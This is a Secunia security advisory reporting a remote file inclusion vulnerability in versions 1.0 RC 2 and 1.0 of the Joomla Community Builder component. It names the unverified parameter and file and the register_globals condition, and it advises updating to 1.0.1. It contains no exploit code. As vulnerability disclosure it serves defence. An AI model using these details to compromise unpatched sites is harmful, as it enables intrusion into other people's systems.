Joomla Community Builder Component File Inclusion

SECUNIA ADVISORY ID:
SA21636

VERIFY ADVISORY:
http://secunia.com/advisories/21636/

CRITICAL:
Highly critical

IMPACT:
System access

WHERE:
>From remote

SOFTWARE:
Community Builder 1.x (component for Joomla)
http://secunia.com/product/11706/

DESCRIPTION:
Matdhule has reported a vulnerability in the Community Builder
component for Joomla, which can be exploited by malicious people to
compromise a vulnerable system.

Input passed to the "mosConfig_absolute_path" parameter in
administrator/components/com_comprofiler/plugin.class.php isn't
properly verified, before it is used to include files. This can be
exploited to include arbitrary files from external and local
resources.

Successful exploitation requires that "register_globals" is enabled.

The vulnerability has been reported in versions 1.0 RC 2 and 1.0.
Prior versions may also be affected.

SOLUTION:
Update to version 1.0.1.
http://www.joomlapolis.com/component/option,com_docman/task,cat_view/gid,46/Itemid,36/

PROVIDED AND/OR DISCOVERED BY:
Matdhule

RECENT ARTICLE

RECENT POST